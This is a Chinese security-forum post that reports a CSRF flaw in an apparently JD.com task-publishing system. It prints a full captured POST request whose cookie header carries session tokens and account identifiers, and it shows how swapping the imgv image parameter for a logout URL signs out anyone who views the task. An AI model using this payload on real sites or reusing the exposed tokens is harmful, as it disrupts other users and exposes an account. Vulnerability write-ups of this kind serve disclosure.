设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 某东某系统-存在 csrf 漏洞。
返回列表 发新帖
查看: 824|回复: 0

某东某系统-存在 csrf 漏洞。

[复制链接]
adopi

179

主题

179

帖子

630

积分

高级会员

Rank: 4

积分
630
发表于 2023-8-27 23:18:18 | 显示全部楼层 |阅读模式
本帖最后由 adopi 于 2023-8-27 23:18 编辑

某东某系统-存在 csrf 漏洞。
发布任务-商品图片参数可控,致他人用户退出登录。
https://xxx.com/newtask/myPublishTask.do

该填的都填上,上传一个正常都图片,然后发布任务获得如下数据包
  1. POST /newtask/publishTaskDetail.do HTTP/2
  2. Host: xxx.com
  3. Cookie:
  4. __jdu=1667624154651199351842;
  5. shshshfpa=bffbb7ed-0911-c439-d212-5efc6db00f4e-1667627595;
  6. shshshfpb=obokTCBPpMnJWsw3c3BBlzg;
  7. shshshfpx=bffbb7ed-0911-c439-d212-5efc6db00f4e-1667627595;
  8. user-key=672b01b1-e0ee-40cf-8eab-e47d1ccf049b;
  9. _tp=iiEf%2FmhIWLG599yV2myF5AJikW44lv8sW%2FsBAFiMuzc%3D;
  10. _pst=jd_4507931c2b851;
  11. unpl=JF8EALpnNSttWk9WUUwBExQQT1xRWwgLSR8DaTRXA1pdTV1RTgEYQUN7XlVdXxRKFR9sYx
  12. RXXFNPVg4ZBCsSEXtdVV9fD0oeBm5vNWRfXxgEARwKSRt-SzNcAjlDCx4CFyZiM21bS2QEKwIcFRZM
  13. XlFeWQ1MEwNvbw1WWVhCUQYrAysSGE9tZG5YCEoWAmdgBFNcaEpkBxoDHhYRTFxXWW1DJRZ
  14. Ob2ACUlpbTlQBHgUfEhBDVVZaXQFOFDNuVwY;
  15. areaId=17;
  16. ipLoc-djd=17-1381-0-0;
  17. logintype=wx;
  18. unick=jd_1xxxsc;
  19. pin=jd_4507931c2b851;
  20. npin=jd_4507931c2b851;
  21. pinId=aoz0B_dGKZVoBBgSBNaYErV9-x-f3wj7;
  22. language=zh_CN;
  23. cn_language=zh_CN;
  24. mba_muid=1667624154651199351842;
  25. __jdv=247986820|direct|-|none|-|1681090586992;
  26. jdc_art=1681090611834-Cki1kkdx7UyK20F566Ptg0JYRXPphsVq;
  27. jdc_art.sig=zIx59SlRnV-jjyx5HSZ-xqSmvCk;
  28. _base_=YKH2KDFHMOZBLCUV7NSRBWQUJPBI7JIMU5R3EFJ5UDHJ5LCU7R2NILKK5UJ6GLA2RGYT
  29. 464UKXAI4Z6HPCTN4UQM3WHVQ4ENFP57OC2LMMUEMI3EC6R675ULDU7EFTOO5DBCMEJCNW
  30. GBDQDCUPF4QE5PIKDPMDW5C2TOB4D5VZTFLDG6LO7SP5MGOZZAC3LW2CWZF5OZUQIZ4TAPF
  31. PJZMR5J56VPXJJWETKB757BUMMC2TRITAKA3RQRJOWOI2FU3JKA3CI6HATPPFF2BFMO2TANNK7D5ZYUHVKFW6WPMSPOBEVOUHLHUMRMZYXPEN7ZQ43BVW3Q6EHQCTF6FOIUATLJM6YV77X3
  32. BVXXATQ;
  33. ll-sso=e3e75483d1c50d71bb8c67119f4ec8b3%3Aaaca4c435e8fe8afd2cf07a89461de37ae5ea1bf
  34. 1f6dc7d7be4fd393c19442d1f7cdf6516b399666d0e1d001413049f1;
  35. focus-lang=zh_CN;
  36. token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IkhmVHQxcDJnWTZDVUlkZjlvd2xDIiwiaWF
  37. 0IjoxNjgxMTA5NzU5LCJleHAiOjE2ODE3MTQ1NTl9.GhbhjsfrhnIQ0BysZNFXivC3lJcIr_2G9Dm74aM
  38. qN0Y; focus-token=1f0b557148c98ce1bf2ec357f7a6e091; focus-team-id=; focus-client=WEB;
  39. chxy_language=zh_CN;
  40. shshshfp=09251028f5bc67ee4533160e6f8c813f;
  41. policy_loc=9IJ101V5YscBESAq8Q0upA==;
  42. smb_track=86C095E3BF0C4BC1986B4F73BA3F8359;
  43. wjQid=64057b4e25ef110155b70f5a;
  44. userName_jdme=;
  45. joyya=1681117442.1681118368.44.1700cg5;
  46. TrackerID=MUzPYrEF5-6XD9yHajP5OSbldiMwtK5ma9MgIDQQ1iuf-bSjOaAM7YiGlSHq1dZ_EOS7w
  47. 2-aLHSEENLtr_knx119_jToedHbpfbCR3gzoNjP9QXec63eOFWZTumgQ6xE;
  48. pt_key=AAJkM9ViADB18Rbg0RpcKjcrhdCCReySHiM3Uc7vxPFgsjCD1gfqOBWUBHLYgCRi6H55oQA
  49. 9iUs;
  50. pt_pin=jd_4507931c2b851;
  51. pt_token=jjbnputl;
  52. pwdt_id=jd_4507931c2b851;
  53. sfstoken=tk01m9ae81b43a8sM3gxeDNKOFQrNhqMGha910xkflqFBP2YbV+L4nlYsKSW/+iGR6yN/o
  54. dli0/8pyISiQ63ZWGNP85y;
  55. wxa_level=1;
  56. _gia_s_local_fingerprint=a5f6f112f16eedc49dc72d2fb354e4e1;
  57. _gia_s_e_joint={"eid":"FIH6HCA4K25HNQKDQDC2TQWRTECH5S2VIAB3N47EMB3BAXCGEVY7EX6
  58. 3PWYRXD6YOH4CG2GUYFJB7HA4RMUMWTOFT4","ma":"","im":"","os":"Mac
  59. OS
  60. X","ip":"sas.98.227.29","ia":"","uu":"","at":"5"};
  61. retina=1;
  62. jxsid=16811187508440301928;
  63. webp=1;
  64. visitkey=8170333901885338;
  65. 3AB9D23F7A4B3CSS=jdd03FIH6HCA4K25HNQKDQDC2TQWRTECH5S2VIAB3N47EMB3BAXCGEVY
  66. 7EX63PWYRXD6YOH4CG2GUYFJB7HA4RMUMWTOFT4AAAAMHNXPLJOAAAAAADL5UPD7PJ7ZO
  67. WMX; ai_page_btn_click_count=c4ca4238a0b923820dcc509a6f75849b; chat.jd.com=20170206;
  68. qid_uid=de3c0720-fb0b-42b7-9a20-0e52219c3aa6;
  69. qid_fs=1681177827238;
  70. qid_ls=1681177827238;
  71. qid_ts=1681177827255;
  72. qid_vis=1;
  73. AUTH_SESSION_ID=MGFjODE4ZjAtMmM2Yi00MWMyLTkzMjktZmNhODgyMTIyZGI4;
  74. AUTH_LOGIN_REDIRECT=6871B5BB13674257A82D15D6679BFBD8;
  75. brain-user-unique=496e400f2c4a45f66d1dc1bbf2c8f7e7c6124ce2;
  76. brain-access-token=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRUeXBlIjo5OSwidGVuYW
  77. 50TmFtZSI6IuWMv-WQjeeUqOaIt-exu-Wei-acuuaehCIsInNjb3BlIjpbInJlYWQiLCJ3cml0ZSJdLCJ0ZW
  78. 5hbnRJZCI6IjE3MjQ2MDY0NzQ2NTI3NTM5MiIsInVzZXJOaWNrTmFtZSI6ImpkXzQ1MDc5MzFjMmI
  79. 4NTEiLCJ1c2VyVHlwZSI6OTksImV4cCI6MTY4MTIyMTI3MCwidXNlcklkIjoiMzgyNjMxMzc5OTg4Mz
  80. MyNTQ0IiwianRpIjoiOWNhOGYwZGMtNzYzMi00Zjg5LThlMTUtNjVhZjM4ODM2NGNjIiwiY2xpZW5
  81. 0X2lkIjoiY2xpZW50IiwiamRQaW4iOiJqZF80NTA3OTMxYzJiODUxIiwic3RhdHVzIjoxfQ.K8Vz19E62vv
  82. rMQsjKBHnp1MfIUcyUMjpGrLX_RZyS-d6lQMdjVtG3kkz1rmziYRap4vKs_nHtYfH2mlbXy4nIfMrt_W
  83. 6upvAUAobnGe0qS4Td7tPEZxHm4cmHqXqS4-flE0lLl_PxXUXyQ6FAf6ejUvM-Ea0U_lrKAUL2NhpM
  84. B6QEnDub4HxiD6wNnJTFDgzFGLWgxtnioPZ8kpjXDDVB4q8thbKxYzLdpOyqNtgKkwF-OY18TXwM_
  85. XBAT4vzujQNqEnbmo-ldZyOWwM3Hpw5lfOiFPHvE3U5vt5O3tAgwjuYXe1nBI-IwpHoW7LTVYKFAs
  86. OiSgw4ocI8HSFmMwSkA;
  87. RT="z=1&dm=jd.com&si=m8wwczn04v&ss=lgbjl9se&sl=4o&tt=8jo0&ld=48q1q&ul=48s47&hd=48
  88. s4f";
  89. cid=3;
  90. __jd_ref_cls=MSearch_DarkLines;
  91. appCode=msc588d6d5;
  92. qd_ad=jdpaycert.jd.com%7C-%7Cjd%7C-%7C0;
  93. qd_uid=LGBO77UB-25A7Z24EY13NJGB1T0YG;qd_fs=1681181738850;
  94. qd_ls=1681181738850;
  95. qd_ts=1681181738850;
  96. qd_sq=1;
  97. bill_pt_key=AAJkM9ViADB18Rbg0RpcKjcrhdCCReySHiM3Uc7vxPFgsjCD1gfqOBWUBHLYgCRi6H55
  98. oQA9iUs; bill_source=7; bill_entrance=100; qyjr_U=QURHbURQcU4xdUgrMzR2eUU5THdNQT09;
  99. qyjr_P=Zk85L2p3SmwzNndscDVLNS9GNW5ISldaeFZaMTJFdzA=;
  100. qyjr_user=iSRn6jEL179yr5M5gF+1pLNFNQNS2QMguE/Oy/bbJ+HIfXlb+g8UQU/FdqTP9D3R;
  101. _jdjr_qy_sid=TkJQdlhPQlZYWlUxRkpjOTVNQk00SnkwelNtNkFVTTVEMTlFSjBTNmtBMlZtY1ZXZGR
  102. oTU5BPT0=;
  103. type=publiser;
  104. userSt=4;
  105. 3AB9D23F7A4B3C9B=FIH6HCA4K25HNQKDQDC2TQWRTECH5S2VIAB3N47EMB3BAXCGEVY7EX63
  106. PWYRXD6YOH4CG2GUYFJB7HA4RMUMWTOFT4;
  107. wlfstk_smdl=cm26rgap6sd1wtgy5m46tb61jz643xwg;
  108. TrackID=1hk8p9EwH7Zk7dNjqfMR9UKUJq7EmwAlOfNVgNT2j8xXAplJELCLWC-1PrVhM3nSLwm0gL
  109. 2lTFwg1vWYT3YAxxLj68WdLzDuzpjAqo_v4miwev8Nl61vv5u1DyhpbenG5;
  110. ceshi3.com=000;
  111. __jda=243020114.1667624154651199351842.1667624155.1681184661.1681192839.89;
  112. __jdc=243020114;
  113. JSESSIONID=F04F94A07CA28E4956FE64BF83B91C7C.s1;
  114. __jdb=243020114.19.1667624154651199351842|89.1681192839;
  115. thor=1AEC2C3DEF910E38F23E728FCF5EA1FCB0FED64250A14630611D20190F7A474B462A9DFA
  116. 91EF4A158C33DA2B85D6D693D8D52F3A51120F3AACD0F31894018D5BC5CE09E972E28530C08
  117. 5D24A1D3FD3BDC13DB8D36C11F491341686D2AD27791BC3B6CED02C3CFC2484B4B77D70D56
  118. 113DF4E11C307D3071DEF9398861DB93F36E1FC575310426F10F2CC3C9014E5CB6291F29D9754
  119. 836DACD0380A2D5306CD05
  120. Content-Length: 374
  121. Sec-Ch-Ua: "Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111"
  122. Accept: application/json, text/javascript, */*; q=0.01
  123. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  124. Sec-Ch-Ua-Mobile: ?0
  125. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
  126. Gecko) Chrome/111.0.0.0 Safari/537.36
  127. Sec-Ch-Ua-Platform: "macOS"
  128. Origin: <a href="https://xxx.com" target="_blank">https://xxx.com</a>
  129. Sec-Fetch-Site: same-origin
  130. Sec-Fetch-Mode: cors
  131. Sec-Fetch-Dest: empty
  132. Referer: <a href="https://xxx.com/arpages/task_publish.html" target="_blank">https://xxx.com/arpages/task_publish.html</a>
  133. Accept-Encoding: gzip, deflate
  134. Accept-Language: zh-CN,zh;q=0.9
  135. modelUse=1&modelUseType=1&task_name=csrf-%E6%B5%8B%E8%AF%95&task_date=2023-04-
  136. 21&task_tel=1867ssas&task_email=caixu%40163.com&producers=&model_basis=1&task_num=
  137. 1&model_name=%E6%A8%A1%E5%9E%8B1&sku=12&imgv=https%3A%2F%2Fimg10.360buyimg.
  138. com%2Ffit%2Fjfs%2Ft1%2F131363%2F3%2F32550%2F13078%2F6434f8f5F90d58233%2Fb84fd7
  139. 60beb0ba44.jpg&color=0&category=%23%23%23%23&size=&notice=
复制代码

对 imgv 参数进行更换如下链接,致其他用户身份认证退出无法正常使用该系统
更换为:
https://passport.xxx.com/uc/login?ltype=logout
更换前:

更换后:

可以在任务集市查看 我们发布带有恶意退出的任务.

访问相关任务即可加载恶意退出链接,或跳转到恶意链接。


即可

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 14:53 , Processed in 0.014228 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表